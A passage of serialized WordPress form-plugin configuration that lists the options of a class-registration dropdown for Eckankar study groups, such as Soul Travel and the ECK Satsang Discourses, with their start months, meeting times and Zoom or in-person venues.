Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:4;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:81:\"Letters of Light and Sound 1 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:5:\"value\";s:81:\"Letters of Light and Sound 1 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:5;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:81:\"Soul Travel 1 - STARTS IN NOVEMBER -- 3rd Saturday at 9:30 am - Florence - Hybrid\";s:5:\"value\";s:80:\"Soul Travel 1 - STARTS IN NOVEMBER -- 3rd Saturday at 930 am - Florence - Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:67:\"Soul Travel 1 - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:66:\"Soul Travel 1 - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:64:\"Soul Travel 1 - STARTS IN MARCH -- 3rd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:63:\"Soul Travel 1 - STARTS IN MARCH -- 3rd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:8;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:76:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:71:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:77:\"The Secret Way - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:72:\"The Secret Way - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:90:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 11:45 am – 1:00 pm - Zoom\";s:5:\"value\";s:85:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:87:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 12:00 – 1:30 pm - Zoom\";s:5:\"value\";s:82:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:99:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 2nd Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:95:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:15;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:99:\"The ECK Satsang Discourses – Third Series - STARTS IN NOVEMBER -- 1st Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:95:\"The ECK Satsang Discourses  Third Series - STARTS IN NOVEMBER -- 1st Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:13;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:16;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:97:\"The ECK Satsang Discourses – Fourth Series - STARTS IN DECEMBER -- 2nd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:93:\"The ECK Satsang Discourses  Fourth Series - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:14;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 7:30 pm - Zoom\";s:5:\"value\";s:78:\"The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:15;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:100:\"The Master 3 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 8:45 – 10:00 am - CO Temple - Hybrid\";s:5:\"value\";s:95:\"The Master 3 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - CO Temple - Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:16;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:20;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:80:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Thursday at 7-8:30 pm - Zoom\";s:5:\"value\";s:79:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Thursday at 7-830 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 